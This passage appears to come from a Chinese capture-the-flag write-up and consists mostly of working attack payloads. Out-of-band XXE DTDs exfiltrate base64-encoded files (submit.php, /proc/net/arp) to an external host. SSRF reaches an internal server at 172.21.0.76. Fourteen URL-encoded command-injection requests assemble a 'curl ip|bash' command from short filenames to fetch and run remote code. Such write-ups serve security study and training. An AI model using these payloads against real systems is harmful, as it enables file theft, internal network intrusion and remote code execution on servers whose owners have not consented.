<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=submit.php"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
成功读出 submit.php
询问Annevi得知内网还有一台服务器
改一下xxe.dtd
1 2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/proc/net/arp"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
得到内网服务器地址
改一下xxe.dtd
1 2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
改一下xxe.dtd
1 2
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76/?token=mytoken"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
然后?然后就没有回显了
考虑到可能是由于过大出错了,采用zlib压缩再读
改一下xxe.dtd
1 2
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#1 >ls\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3els%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#2 ls>_ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=ls%3e_"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#3 >\ \\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#4 >-t\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%2d%74%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#5 >\>\a <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%3e%61"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#6 ls>>_ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%6c%73%3e%3e%5f"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#7 >bash <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%62%61%73%68"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#8 >\|\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%7c%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#9 >ip\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%69%70%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#10 >\ \\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#11 >rl\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%72%6c%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#12 >cu\\ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%63%75%5c%5c"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#13 sh _ <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%5f"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">
#14 sh a <!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%61"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">